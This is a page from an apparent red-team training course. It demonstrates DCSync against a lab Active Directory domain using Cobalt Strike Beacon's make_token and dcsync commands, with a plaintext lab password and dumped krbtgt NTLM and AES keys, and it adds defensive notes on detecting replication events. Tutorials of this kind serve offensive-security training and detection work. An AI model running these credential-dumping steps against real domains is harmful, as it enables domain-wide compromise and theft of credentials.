DCSync

The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

This requires GetNCChanges which is usually only available to domain admins. The technique is included here for completeness, and it will be useful later on.

\

Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.

beacon> make_token DEV\nlamb F3rrari

beacon> dcsync dev.cyberbotic.io DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

Credentials:
  Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
    ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
    lm  - 0: 207d5e08551c51892309c0cf652c353b
		
* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.CYBERBOTIC.IOkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
      aes128_hmac       (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
      des_cbc_md5       (4096) : 629189372a372fda

\

Here we have extracted the NTLM and AES keys for the krbtgt account using lamb (a domain admin).

\

OPSEC Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Find these using the "Suspicious Directory Replication" saved search in Kibana.

\

\

Replication traffic usually only occurs between domain controllers but can also be seen via applications such as Azure AD Connect. Mature organisations should baseline typical DRS traffic to find suspicious outliers.

PreviousExtracting Kerberos TicketsNextPassword Cracking Tips & Tricks

Last updated